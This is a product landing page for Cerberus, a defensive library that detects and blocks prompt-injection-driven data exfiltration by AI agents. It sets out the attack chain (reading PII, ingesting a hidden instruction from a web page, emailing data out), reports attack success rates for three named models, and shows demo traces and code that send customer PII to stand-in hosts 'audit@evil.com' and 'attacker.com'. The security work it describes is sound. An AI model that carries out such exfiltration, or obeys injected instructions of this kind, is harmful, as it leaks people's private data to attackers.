Agentic AI Runtime Security

Your AI agents are being
weaponized against you

Every AI agent that can read private data, process external content, and send outbound messages is vulnerable to the same fundamental attack. Cerberus detects, correlates, and blocks it in real time, before data leaves your system.

Get started in 5 min View on GitHub
cerberus demo
─── Phase 1: Unguarded ───────────────────────────────
→ readCustomerData({}) ← SSN, email, phone · 5 records
→ fetchWebpage({url}) ← injection payload embedded in page
→ sendEmail({to: "audit@evil.com", body: <PII>})
 
⚠ EXFILTRATION CONFIRMED · 1,202 bytes sent · $0.001 total cost
 
─── Phase 2: Guarded ─────────────────────────────────
→ readCustomerData [Cerberus] turn-000: score=1/4 → ○
→ fetchWebpage [Cerberus] turn-001: score=2/4 → ○
→ sendEmail [Cerberus] turn-002: score=3/4 → ✗ BLOCKED
 
✓ EXFILTRATION BLOCKED · 0 requests to capture server
~100% · attack success rate when unguarded, across 3 LLM providers
N=285 · real API calls, scientifically validated
52μs · detection overhead (p50), 0.01% of LLM latency
747 · tests, 98%+ coverage
0% · false positive rate on clean control runs

The Lethal Trifecta

Any AI agent that combines the three capabilities below is exploitable. The attack is reproducible today with free-tier API access and three function calls.

Layer 1 (L1) · Privileged Access
The agent reads sensitive data: CRM records, PII, internal documents, credentials.
Layer 2 (L2) · Injection
External content manipulates the agent's behavior: a hidden instruction in a webpage, email, or document.
Layer 3 (L3) · Exfiltration
The agent sends private data to an attacker-controlled endpoint: email, webhook, API call.

When all three fire in the same session, Cerberus scores the session at 3/4 and interrupts the outbound call before data leaves your system.

Layer 4 (novel): cross-session memory contamination. An attacker injects a payload into Session 1 that triggers exfiltration in Session 3. No existing tool detects this; Cerberus ships the first deployable defense.
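The correlation scoring described above can be sketched as a per-session tally. This is an illustrative TypeScript model only, not the Cerberus engine: the names `SessionScore`, `record`, and `shouldBlock` are invented for this sketch.

```typescript
// Illustrative sketch (not Cerberus APIs): each detection layer that
// fires contributes one point to a per-session risk score; the outbound
// call is interrupted once the score crosses the threshold.
type Layer = 'L1-privileged-read' | 'L2-injection' | 'L3-outbound' | 'L4-memory';

class SessionScore {
  private fired = new Set<Layer>();

  // A layer can fire many times; it only counts once toward the score.
  record(layer: Layer): void {
    this.fired.add(layer);
  }

  get score(): number {
    return this.fired.size; // 0..4
  }

  shouldBlock(threshold = 3): boolean {
    return this.score >= threshold;
  }
}

const session = new SessionScore();
session.record('L1-privileged-read'); // readCustomerData returned PII
session.record('L2-injection');       // fetched page carried a payload
session.record('L3-outbound');        // sendEmail targets an untrusted domain
// session.score is now 3/4, so session.shouldBlock() returns true
```

Treating each layer as a set membership rather than a counter is why repeated reads of the same sensitive source do not inflate the score.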

One function call. Full coverage.

Cerberus wraps your existing tool executors. No agent framework changes. No model swaps.

🔍
4 Detection Layers
L1 data source classification, L2 token provenance, L3 outbound intent, L4 memory contamination, all feeding one correlation engine.
🧬
6 Sub-Classifiers
Secrets detector, injection scanner, encoding detector, MCP poisoning scanner, domain classifier, behavioral drift detector.
📡
OpenTelemetry Built-In
One span + 3 metrics per tool call. Plug into Grafana, Datadog, Honeycomb, Jaeger, or any other OTel backend. Zero overhead when disabled.
🌐
HTTP Proxy Mode
Zero code changes. Run Cerberus as a gateway: the agent routes tool calls to POST /tool/:toolName and detection is transparent.
🔌
Framework Adapters
Native support for LangChain, Vercel AI SDK, and OpenAI Agents SDK out of the box.
📊
Grafana Dashboard
Pre-built dashboard with 14 panels. One command: docker compose -f monitoring/docker-compose.yml up -d
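In proxy mode the only integration point is the gateway's POST /tool/:toolName route. A minimal client sketch, assuming a gateway on localhost:8787, a JSON request body, and a non-2xx status on block (host, port, and blocking status are assumptions; check your deployment's configuration):

```typescript
// Sketch of a proxy-mode client. Only the POST /tool/:toolName route
// comes from the docs above; everything else here is assumed.
function toolUrl(base: string, name: string): string {
  return `${base}/tool/${encodeURIComponent(name)}`;
}

async function callTool(name: string, args: unknown): Promise<unknown> {
  const res = await fetch(toolUrl('http://localhost:8787', name), {
    method: 'POST',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify(args),
  });
  if (!res.ok) {
    // Assumed behavior: the gateway rejects the call once the session
    // risk score crosses the configured threshold.
    throw new Error(`Tool call rejected: HTTP ${res.status}`);
  }
  return res.json();
}
```

Because detection lives in the gateway, the agent code above has no Cerberus dependency at all; swapping the base URL is the entire integration.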

Validated at scale

N=285 real API calls: 30 payloads × 3 trials × 3 providers. Wilson 95% confidence intervals. 6-factor causation scoring. 5 negative control runs per provider, with 0 false exfiltrations.

Provider    Model              Any Exfiltration   Full Injection Compliance   95% CI
OpenAI      gpt-4o-mini        100%  (90/90)      17.8% (16/90)               [11.2%, 26.9%]
Anthropic   claude-sonnet-4    100%  (90/90)      2.2%  (2/90)                [0.6%, 7.7%]
Google      gemini-2.5-flash   98.9% (89/90)      48.9% (44/90)               [38.8%, 59.0%]

Provider    Detection Rate   False Positive Rate   L1 Accuracy   L2 Accuracy
OpenAI      23.3%            0.0%                  100%          100%
Anthropic   2.2%             0.0%                  100%          100%
Google      70.0%            0.0%                  100%          100%

L1 and L2 are deterministic: 100% accuracy across all 285 runs, zero false positives, zero false negatives. L3 detection tracks successful injection compliance. Control group: 0/15 false exfiltrations.
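The Wilson 95% intervals in the table are plain arithmetic and easy to reproduce. A short TypeScript check (pure math, no Cerberus code involved):

```typescript
// Wilson score interval at confidence z (1.96 for 95%), the interval
// the benchmark table reports for injection-compliance rates.
function wilson(successes: number, n: number, z = 1.96): [number, number] {
  const p = successes / n;
  const z2 = z * z;
  const denom = 1 + z2 / n;
  const center = p + z2 / (2 * n);
  const margin = z * Math.sqrt((p * (1 - p)) / n + z2 / (4 * n * n));
  return [(center - margin) / denom, (center + margin) / denom];
}

// Reproduces the OpenAI row: 17.8% (16/90) -> [11.2%, 26.9%]
const [lo, hi] = wilson(16, 90);
console.log(`[${(lo * 100).toFixed(1)}%, ${(hi * 100).toFixed(1)}%]`);
// prints [11.2%, 26.9%]
```

The Wilson interval is the right choice here: unlike the naive normal approximation, it stays inside [0, 1] even for the near-zero rates in the Anthropic row.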

From zero to blocked attack in 5 minutes

Install the package and wrap your tool executors.

bash
npm install @cerberus-ai/core
TypeScript · guard() wraps your tools, no framework changes
import { guard } from '@cerberus-ai/core';

// Your existing tool executors
const tools = {
  readDatabase: async (args) => db.query(args.sql),
  fetchUrl:     async (args) => fetch(args.url).then(r => r.text()),
  sendEmail:    async (args) => mailer.send(args),
};

// One function call: Cerberus intercepts transparently
const { executors: secured } = guard(
  tools,
  {
    alertMode: 'interrupt',
    threshold: 3,
    trustOverrides: [
      { toolName: 'readDatabase', trustLevel: 'trusted'   },
      { toolName: 'fetchUrl',     trustLevel: 'untrusted' },
    ],
  },
  ['sendEmail'], // outbound tools: L3 monitors these
);

// Use exactly like before โ€” Cerberus runs in the middle
await secured.readDatabase({ sql: 'SELECT * FROM customers' });
await secured.fetchUrl({ url: 'https://attacker.com/payload' });
await secured.sendEmail({ to: 'audit@evil.com', body: piiData });
// ↑ [Cerberus] Tool call blocked: risk score 3/4

See the getting-started guide for the full walkthrough, or try the Docker demo with no API keys:

bash · no API keys required
docker run --rm ghcr.io/odingard/cerberus-demo

Works with your stack

Native adapters for the major agentic AI frameworks, with more planned.

guard() (generic) · createProxy() (HTTP) · LangChain · Vercel AI SDK · OpenAI Agents SDK · OpenAI Function Calling · Anthropic Tool Use · Google Gemini · MCP Tool Scanning · AutoGen (planned) · Ollama (planned)

Start protecting your agents today

Open source. MIT license. Zero runtime dependencies beyond SQLite.

npm install @cerberus-ai/core Star on GitHub